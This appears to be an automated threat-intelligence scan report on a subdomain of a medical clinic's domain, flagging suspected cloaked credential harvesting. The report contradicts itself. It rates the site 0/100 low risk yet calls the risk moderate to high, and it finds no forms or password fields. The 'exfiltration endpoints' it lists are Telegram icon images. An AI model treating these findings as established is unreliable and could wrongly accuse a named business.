mass.report
Scan Intelligence Report0/100
low Risk
wa.advancedspineandposture.com
https://wa.advancedspineandposture.com/
IP
104.18.30.192 · Cloudflare, Inc.
Location
Toronto, Canada
Domain Age
3716 days
HTTP
200 · 69.3s
SSL
Valid· E8, Let's Encrypt, US
Status
COMPLETED
Registered-domain escalation
Submit advancedspineandposture.com as the primary IOC, enriched with evidence from hostile subdomains like wa.advancedspineandposture.com.
KB/IOK Matches (0)—
No KB/IOK detections were recorded for this scan.
advancedspineandposture.com (wa.advancedspineandposture.com subdomain)
Unknownhealthcare | technology · 6/3/2026
Summary
The page presents a cloaked SPA on a subdomain of advancedspineandposture.com, with evidence suggesting off-domain credential collection via dynamically loaded scripts and an off.php endpoint. Visual and network indicators show off-domain assets and a likely cloaked/obfuscated credential capture flow, but there is no direct static login form in HTML; the SPA-rendered form may be loaded by JavaScript. The combination indicates potential credential harvesting activity rather than legitimate first-party content. The site is hosted behind Cloudflare and uses a Let's Encrypt certificate valid through Aug 2026. Analyst flagged likely cloaking/evasion behavior for this target. Analyst context noted: Analyst note: this target may cloak content or block scanners.
Evidence Summary
▸Observed 3 capture stage(s); canonical stage is late_render_3s.
▸Off-domain submission or API endpoints observed: https://cdn3d.iconscout.com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png, https://img.haberkurt.com/icons/telegram.webp.
▸Distinctive asset clues: off.php, index-BCx7Soz5.js, css2, index-BsPf_94V.css, dollar-house-3d-icon-png-download-10908425.png, giveaway-coupon-3d-icon-free-png.png.
Capture
Stages: 3
Canonical: Late Render (+3s)
Changed: No
Credential Signals
Forms: 0
Password fields: 0
Late-stage login UI: No
Resource Signals
Resources: 200
Hosts: 8
Domains: 8
Suspicious Endpoints
hxxps://cdn3d[.]iconscout[.]com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png
hxxps://img[.]haberkurt[.]com/icons/telegram.webp
Off-Domain Posts
hxxps://cdn3d[.]iconscout[.]com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png
hxxps://img[.]haberkurt[.]com/icons/telegram.webp
Attack Techniques (3)
Single-Page Application (SPA) rendering forms via JavaScript (dynamic credential collection).Off-domain resource loading (off.php, external JS) to retrieve or exfiltrate data.External script and asset loading from third-party domains (mama.atarhaber.com, iconscout, haberkurt) potentially used for ad/credential collection.
Indicators of Compromise (1)
▸Off-domain image/catalog endpoints detected as suspicious endpoints for Telegram icons (potential data exfiltration or adware assets)
Risk AssessmentUsed in abuse reports
The page is hosted under a legitimate-sounding medical clinic subdomain but the content shows signs of cloaking and off-domain endpoints used for dynamic content. The presence of off.php and external assets from unrelated domains, combined with a SPA approach that can render credential capture forms without static HTML, indicates a potential data harvesting or credential-phishing setup. The risk is moderate to high for abuse (credential collection or adware). The SSL cert is valid but issued by Let’s Encrypt; the domain age is substantial, yet the analyst notes suggest cloaking behavior observed, which should be treated as suspicious. Recommend monitoring and consider blocking if corroborated by further evidence of credential harvesting. Analyst-reported cloaking/evasion suspicion increases confidence that the operator is actively attempting to evade automated security analysis. Analyst context was provided and corroborated during this assessment (Analyst note: this target may cloak content or block scanners.).
Recommended Action
Monitor
Cross-Reference8
URL Intelligence
Domain Intelligence
IP Intelligence
Public threat feed available — JSON API